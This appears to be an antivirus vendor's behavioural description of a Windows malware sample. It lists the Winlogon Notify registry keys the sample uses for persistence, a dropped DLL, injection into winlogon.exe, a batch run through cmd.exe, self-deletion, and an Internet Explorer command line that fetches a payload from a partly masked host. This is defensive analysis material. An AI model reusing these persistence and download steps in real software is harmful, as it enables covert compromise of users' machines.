Technical Information
To ensure autorun and distribution:
Modifies the following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\bebbedbbacd] 'Startup' = 'sup'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\bebbedbbacd] 'Logon' = 'l'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\bebbedbbacd] 'DllName' = '<SYSTEM32>\bebbedbbacd.dll'
Malicious functions:
Executes the following:
- '%PROGRAM_FILES%\Internet Explorer\IEXPLORE.EXE' http://wl.##bolar.com/v3062/repins.jpg?ms####################################################################################################################################################
- '<SYSTEM32>\cmd.exe' /c %TEMP%\b4e2f0350b224e9db53b3b4db7da18b8.bat
Injects code into
the following system processes:
- <SYSTEM32>\winlogon.exe
Modifies file system :
Creates the following files:
- <SYSTEM32>\RCX1.tmp
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\repins[1].jpg
- %TEMP%\b4e2f0350b224e9db53b3b4db7da18b8.bat
- <SYSTEM32>\bebbedbbacd.dll
Deletes the following files:
- <SYSTEM32>\bebbedbbacd.dll
Moves the following files:
- from <SYSTEM32>\RCX1.tmp to <SYSTEM32>\bebbedbbacd.dll
Deletes itself.
Network activity:
Connects to:
- 'wl.##bolar.com':80
- 'localhost':1037
TCP:
HTTP GET requests:
- wl.##bolar.com/v3062/repins.jpg?ms####################################################################################################################################################
UDP:
- DNS ASK wl.##bolar.com
Miscellaneous:
Searches for the following windows:
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''